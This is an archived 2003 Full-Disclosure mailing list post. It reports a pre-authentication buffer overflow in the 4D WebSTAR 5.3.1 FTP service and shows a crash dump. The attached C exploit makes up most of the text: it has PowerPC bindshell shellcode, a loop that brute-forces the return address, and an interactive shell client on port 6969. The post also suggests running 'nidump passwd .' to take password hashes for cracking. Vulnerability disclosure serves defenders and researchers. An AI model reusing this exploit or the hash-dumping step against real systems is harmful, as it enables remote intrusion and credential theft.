lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.BSO.4.53.0309112055390.9271@doris.cyberdom>
From: br00t at blueyonder.co.uk (B-r00t)
Subject: 4D WebSTAR FTP Buffer Overflow.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Remote Vulnerability in 4D WebSTAR Server Suite.
================================================

Date:           11.09.2003
Author:		B-r00t. 2003.
Email:          B-r00t <br00t@...eyonder.co.uk>

Vendor:		4D.
Reference:      http://www.4d.com/products/webstar.html
Versions:       4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested:		4D WebSTAR 5.3.1 (Trial Version).

Exploit:	[attached] 4DWS_ftp.c - Gives a shell on port 6969.

Description:	There is a pre authentication buffer overflow
		that exists in the login mechanism of the WebSTAR
		FTP service. As shown below: -

$ ftp maki
Connected to maki (192.168.0.69).
220 FTP server ready.
Name (maki:br00t): test
331 User name OK, need password.
Password: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcd
530 FTP login failed.
Login failed.
421 Service not available, remote server has closed connection


		The following information is reported in the crash
		logfile '/Users/webstar/Library/Logs/CrashReporter/
		WSWebServer.crash.log'

**********

Date/Time:  2003-09-08 09:25:24 +0100
OS Version: 10.2.6 (Build 6L60)
Host:       maki

Command:    WSWebServer
PID:        359

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0x61626364

PPC Thread State:
  srr0: 0x61626364 srr1: 0x4000f030                vrsave: 0x00000000
   xer: 0x00000000   lr: 0x61626364  ctr: 0x90000e40   mq: 0x00000000
    r0: 0x61626364   r1: 0xf02874f0   r2: 0xa0007728   r3: 0xf0288cd0
    r4: 0xf02872e0   r5: 0x0000005e   r6: 0x80808080   r7: 0x00000001
    r8: 0x30000000   r9: 0x00954e64  r10: 0xf02870aa  r11: 0x00959e94
   r12: 0x00000000  r13: 0x00000000  r14: 0x00000000  r15: 0x00000000
   r16: 0x00000000  r17: 0x00000000  r18: 0x00000000  r19: 0x00000000
   r20: 0x00000000  r21: 0x00000000  r22: 0x00000000  r23: 0x0000000b
   r24: 0x00958fec  r25: 0x00958fec  r26: 0x58585858  r27: 0x58585858
   r28: 0x58585858  r29: 0x58585858  r30: 0x58585858  r31: 0x58585858

		As can be seen from the crash dump, the application
		has attempted to execute code at '0x61626364' which
		is ASCII code for 'abcd'. Being able to influence the
		applications execution process means it is possible
		for an attacker to execute arbitrary code and thus
		gain access to the target machine. Fortunately, the
		service is running as the 'webstar' user which is not
		an administrative account by default. However, once an
		attacker has gained initial access to the target machine,
		it is possible to access the system password hashes using
		the 'nidump' utility and hence possibly gain admin (root)
		priveleges if these hashes are cracked.

FIX:		Disable the FTP service until a fix is available.

Status:		Vendor informed 08.09.2003.





- -- 

B#.
- ----------------------------------------------------
Email : B-r00t <br00t@...eyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
		  ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------







-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/YNSOrVael3EBVGIRAnkOAKDC81IlxG6v05ctDdGqJWU7+kekagCfaSpH
elBa7Jmca+z8ralZp6tDgwQ=
=4WHc
-----END PGP SIGNATURE-----
-------------- next part --------------
/*

Remote Vulnerability in 4D WebSTAR Server Suite.
================================================
                                                                                           
Date:           11.09.2003
Author:         B-r00t. 2003.
Email:          B-r00t <br00t@...eyonder.co.uk>
Webpage:	Http://doris.scriptkiddie.net
IRC:		doris.scriptkiddie.net:6667 - STD
		doris.scriptkiddie.net:6969 - SSL
		#cheese & #0day.
                                                                     
Reference:      http://www.4d.com/products/webstar.html
Versions:       4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested:         4D WebSTAR 5.3.1 (Trial Version).
                                                           
Exploit:        4DWS_ftp.c - On success a bindshell is spawned
		on port 6969. Although the resulting shell is
		UID 'webstart', it is usually possible to
		execute 'nidump passwd .' to obtain the system
		password hashes for cracking.                                              

Compile:        gcc -o 4DWS_ftp 4DWS_ftp.c
                                                                                           
Description:    There is a pre authentication buffer overflow
                that exists in the login mechanism of the WebSTAR
                FTP service. See advisory for further details.

Remember Kiddiez ... An Apple A Day ...!!!!
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>

// Defines
#define EXPLOIT		"4DWS_ftp"
#define BINDSHELL_PORT	6969
#define FTP_PORT	21
#define MAXSIZE		1024

// Prototypes
int usage (void);
int get_connect (int port, char *host);
int send_sock (char *buff);
int read_sock (char *buff);
int check_bindshell(int port, char *host);

//Variables
int sock, port=21, lsb;
char evilbuff[MAXSIZE], temp[MAXSIZE];
char user[] = "USER 4D4D" "\x0d\x0a";
char retaddy[5], filler[MAXSIZE];
unsigned long int ret, loop;

int main (int argc, char *argv[])
        {
char shellcode[] = //PPC forkin bindshell 6969 by B-r00t.2003.
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x3b\xdf\xff\x89"
"\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x3b\xdf\xff\x8b"
"\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x38\xac\xfe\x96"
"\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x7c\x67\x1b\x78"
"\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x38\x0c\xfe\xfa"
"\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x90"
"\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x39\x1f\xff\x83"
"\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x41\x41\x41\x41"
"\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\x02\x1b\x39"
"\x41\x41\x41\x41"; // Yu Cant Get This Stuff In Storez Man!!!

char nops[] =
	"\x60\x60\x60\x60\x60\x60\x60\x60";

        printf ("\n%s by B-r00t <br00t@...eyonder.co.uk>. (c) 2003.\n", EXPLOIT);
        printf ("\nExploits the pre authentication buffer overflow in the");
        printf ("\nWebSTAR 5.3.1 FTP service.");
        
	if (argc < 2)
        usage ();
	
	printf ("\nPatience ...\n\n");
        
	memset(filler, '\0', sizeof(filler));
        memset(filler, 0x78, 173);
        filler[0] = 'P';
        filler[1] = 'A';
        filler[2] = 'S';
        filler[3] = 'S';
        filler[4] = 0x20;
	
	for (lsb=0; lsb<9; lsb+=4) {//Increase range if no succcess.       
	for (loop=0xf018f504+lsb; loop<0xf028f505+lsb; loop+=0x1000)
        {
        ret=loop;
	printf ("\n[0x%x] ", ret);
        retaddy[0] = (int)((ret & 0xff000000) >> 24);
        retaddy[1] = (int)((ret & 0x00ff0000) >> 16);
        retaddy[2] = (int)((ret & 0x0000ff00) >> 8);
        retaddy[3] = (int) (ret & 0x000000ff);
        retaddy[4] = '\0';
        
	memset(evilbuff, '\0', sizeof(evilbuff));
        strcpy (evilbuff, filler);
        strcat (evilbuff, retaddy);
        strcat (evilbuff, nops);
        strcat (evilbuff, shellcode);
        strcat (evilbuff, "\x0d\x0a");
	
	if ((sock=socket(AF_INET, SOCK_STREAM, 6)) == -1)
					{
					perror(" Retrying! ");
					loop-=0x1000;
					sleep(2);
					continue;
					}
	
	if (get_connect(FTP_PORT, argv[1]) ==-1)
					{
					perror(" Retrying! ");
					loop-=0x1000;
					sleep(2);
					close(sock);
					continue;
					}
	read_sock(temp);
        send_sock (user);
        read_sock(temp);
        send_sock (evilbuff);
        read_sock(temp);
	close(sock);
        sleep(3);// Let service respawn!
	
	check_bindshell(BINDSHELL_PORT, argv[1]);
	}}
	printf("\n\nIf its still up... Go Again!\n\n");
	exit(0);
}//End_Main


//Check For Bindshell 6969
int check_bindshell(int port, char *host)
	{
	fd_set rfds;
	int sel=0, rd=0;
	char *ptr = temp;
        memset(temp, '\0', MAXSIZE);
	
	if((sock=socket(AF_INET, SOCK_STREAM, 6))== -1)
	{
	perror("Socket Error.");
	return -1;
	}
		
	if (get_connect(port, host) <0)
					{		
                			close (sock);
                			return -1;
                			}
        else printf (" Yay~!\n\aWo0tWo0t! ... We got a shell on %s!\n\n>", host);
	
        // Start clean ..
	fflush(stdin);
        fflush(stdout);
        fflush(stderr);

	do {
         FD_ZERO(&rfds);
         FD_SET(0, &rfds);
         FD_SET(sock, &rfds);
         sel=select(sock+1, &rfds, NULL, NULL, NULL);
	memset(temp, '\0', MAXSIZE);
	if (sel) {
        
	 if(FD_ISSET(sock, &rfds)) {
					rd=(read_sock(temp));
					printf("%s", temp);
               				}
         if(FD_ISSET(0, &rfds)) {
					rd=(read(0, ptr, MAXSIZE-1));
                               		send_sock(temp);
                      			}
			}
        } while( sel && rd );
        close(sock);
	printf ("\nShell Aborted!\n");
	exit(0);
}	                                                            


//Do Socket Connect
int get_connect (int port, char *host)
        {
        struct sockaddr_in dest_addr;
	dest_addr.sin_family = AF_INET;
        dest_addr.sin_port = htons(port);
        if (! inet_aton(host, &(dest_addr.sin_addr)))
                return -1;
                                                                                                              
        memset( &(dest_addr.sin_zero), '\0', 8);
        if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1)
		{
		printf(" Fail!");
		close(sock);
                return -1;
		}
        else return 0;
}
                                                                                                              
//Send Data To Socket
int send_sock (char *buff)
        {
        int bytes = 0;
        bytes = (send (sock, buff, strlen(buff), 0));
		if (bytes == -1) 
		{
		perror("Send Error.");
		close(sock);
		return -1;
		}
	else return bytes;
}

//Read Data From Socket
int read_sock (char *buff)
        {
        int bytes = 0;
        bytes = (recv (sock, buff, MAXSIZE-1, 0));
                if (bytes == -1) 
		{
		perror ("Recv Error.");
		close(sock);
		return -1;
		}
	else return bytes;
}

//Usage Message
int usage (void)
        {
        printf ("\n\nUsage: %s [IP_ADDRESS] ", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 \n\n", EXPLOIT);
        exit (-1);
}

/* Shoutz:      Haggis For Supplying Pesticide & Patience.	*/
/*		Marshal-l, Rux0r, macavity, Mum & Dad.		*/
/*              The doris.scriptkiddie.net posse!               */
/*              That One Doris ... U-Know-Who-U-R!              */
/*								*/
/* Dedicated:   Sad Apple Slashdot Trollz - 'Now Ya Get iT ?'   */
/* THE END - AMEN.                                              */


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ